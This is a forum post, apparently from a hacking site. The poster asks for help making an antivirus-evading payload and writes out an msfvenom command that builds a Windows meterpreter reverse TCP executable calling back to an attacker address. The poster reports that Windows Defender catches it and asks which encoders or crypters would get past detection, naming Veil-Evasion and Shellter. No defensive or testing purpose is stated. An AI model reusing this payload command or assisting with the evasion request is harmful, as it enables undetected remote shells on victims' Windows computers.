Windows Defender Pick Up My Payload

Jun 30, 2016 12:54 PM

hi i need some help with creating a undetecable paylaod

the script i am using is

msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikataga_nai -i 200 > xxx.exe

after i create the payload i move it to a windows 10 64bit and its immediately pick it up .

i was wondering maybe it cuz of the x86 encoder ? even when i use veil-evasion the windows defender get it.

are there better encoder / crypter known in kali then i am missing ?

the only way i get pass my windows defender is by usnig shellter but then i dont get a meterpreter shell back ...

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!